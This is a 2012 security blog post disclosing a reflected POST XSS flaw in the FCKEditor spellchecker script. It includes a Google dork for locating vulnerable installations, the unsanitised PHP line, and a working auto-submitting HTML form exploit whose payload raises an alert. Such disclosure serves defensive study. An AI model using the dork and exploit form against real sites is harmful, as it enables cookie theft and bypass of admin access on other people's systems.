BackBox.org Blog
  • BackBox.org
  • Community
  • Blog
  • Forum
  • Membership
  • Sitemap
  • Contact
  • Click to open the search input field Click to open the search input field Search
  • Menu Menu

FCKEditor reflected XSS vulnerability

June 22, 2012/in News

Emilio Pinna has recently found a reflected POST XSS on a popular web WYSIWYG editor called FCKEditor. In 2009 has been rewrited and fixed with new name CKEditor, but old version is still popular as stand-alone application as WordPress/Joomla/Drupal extensions and embedded as editor in of web applications.

The bugged software was spreaded for more than six years and actually Google counts still more than 1,5 billion of results. A plausbile Google dork filtering out PHP sources could be:

inurl:fck_spellerpages/spellerpages/server-scripts/ -”The following variables”

The vulnerability

The reflected XSS is injected through ‘textinputs’ POST parameter array, printed without sanization in line 27:

echo "textinputs[$key] = decodeURIComponent(\"" . $val . "\");\n";

As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session that visit resulting in a cookie stealing and bypass of admin access controls. Exploit is CRSF-like due to POST vulnerable parameter. Form exploit:

<html>
<body>
<iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe>
  <form method="post" name="sender"
   action="http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/
spellchecker.php" target="hidden">
   <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");
</script><!--' />
  </form>
</body>
<script>document.sender.submit(); </script>
</html>

Have fun!

Share this entry
  • Share on Facebook
  • Share on X
  • Share on Pinterest
  • Share on LinkedIn
  • Share on Tumblr
  • Share on Vk
  • Share on Reddit
  • Share by Mail
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png 0 0 admin https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png admin2012-06-22 14:44:042018-10-02 21:31:34FCKEditor reflected XSS vulnerability
Search Search

Categories

  • News
  • Releases

Archives

Copyright © BackBox.org
  • Link to X
  • Link to Facebook
  • Link to LinkedIn
  • Link to Youtube
  • Link to Telegram
Link to: GRUB error being fixed on BackBox 64 bit version Link to: GRUB error being fixed on BackBox 64 bit version GRUB error being fixed on BackBox 64 bit version Link to: Talk @ HTML.it Release Party Link to: Talk @ HTML.it Release Party Talk @ HTML.it Release Party
Scroll to top Scroll to top Scroll to top